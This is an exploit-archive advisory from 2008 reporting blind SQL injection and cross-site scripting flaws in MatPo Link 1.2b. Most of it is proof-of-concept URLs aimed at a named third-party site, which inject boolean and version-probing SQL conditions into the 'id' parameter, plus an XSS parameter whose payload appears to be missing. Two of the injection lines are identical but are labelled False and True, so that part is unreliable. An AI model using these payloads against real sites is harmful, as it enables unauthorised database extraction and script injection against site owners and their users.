[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities
# Published : 2008-11-03
# Author : Hakxer
# Previous Title : Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
# Next Title : pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability
###########################################################################
______ __ __ ______ __ ______
/ ____/___ / / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/ / / / / __ / __ / _ / ___/ ___/ / / / _ / __ `/ __ `__
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/__, / /_/ ____/____/__,_/___/_/ /____/ /_/ ___/__,_/_/ /_/ /_/
/____/ EgY Coders Vulnerability Research TM
# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk
##########################################################################
|| Blind Sql Inj ||
POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
Exploit :
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
|| Cross Site Scripting ||
Poc:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=
# Proud To be a Muslim #
#_=END=_#
# www.Syue.com [2008-11-03]